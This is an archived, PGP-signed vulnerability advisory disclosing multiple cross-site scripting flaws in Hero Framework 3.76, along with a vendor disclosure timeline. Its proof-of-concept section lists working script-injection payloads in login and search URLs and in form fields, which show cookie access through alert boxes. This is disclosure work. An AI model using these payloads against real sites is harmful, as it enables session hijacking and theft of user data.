Hero Framework 3.76 Cross Site Scripting

2013-01-11T00:00:00
ID PACKETSTORM:119470
Type packetstorm
Reporter Stefan Schurtz
Modified 2013-01-11T00:00:00

Description

                                        
                                            `  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Advisory: Hero Framework 3.76 Multiple Cross-site Scripting  
vulnerabilities  
Advisory ID: SSCHADV2012-023  
Author: Stefan Schurtz  
Affected Software: Successfully tested on Hero Framework 3.76  
Vendor URL: http://www.heroframework.com/  
Vendor Status: informed  
  
===========================  
Vulnerability Description  
===========================  
  
Hero Framework 3.76 is prone to multiple Cross-Site Scripting  
vulnerabilities  
  
======================  
PoC-Exploit  
======================  
  
http://[target]/hero_os/users/login?errors=true&username='"></style></script><script>alert(document.cookie)</script>  
http://[target]/hero_os/search?q=" onmouseover%3dalert(/XSS/) %3d"  
http://[target]/hero_os/users/login?errors=true&username="  
onmouseover%3dalert(/XSS/) %3d"  
  
// POST-Parameter  
  
Username: '"><script>alert(document.cookie)</script>  
First Name: '"><script>alert(document.cookie)</script>  
Last Name: '"><script>alert(document.cookie)</script>  
  
======================  
Solution  
======================  
  
- -  
  
======================  
Disclosure Timeline  
======================  
  
16-Dec-2012 - informed via contact form  
16-Dec-2012 - feedback from vendor  
  
======================  
Credits  
======================  
  
Vulnerabilities found and advisory written by Stefan Schurtz.  
  
======================  
References  
======================  
  
http://www.darksecurity.de/advisories/2012/SSCHADV2012-023.txt  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.12 (MingW32)  
Comment: Thunderbird-Portable 3.1.20 by GnuPT - Gnu Privacy Tools  
Comment: Download at: http://thunderbird.gnupt.de  
  
iEYEARECAAYFAlDvDSwACgkQg3svV2LcbMBDvQCeOwalzm6ixV0mwEARVAj5CpU8  
nmcAn25XSY+IieYYbN4tn37O9jd2+LcC  
=n4gk  
-----END PGP SIGNATURE-----  
  
  
`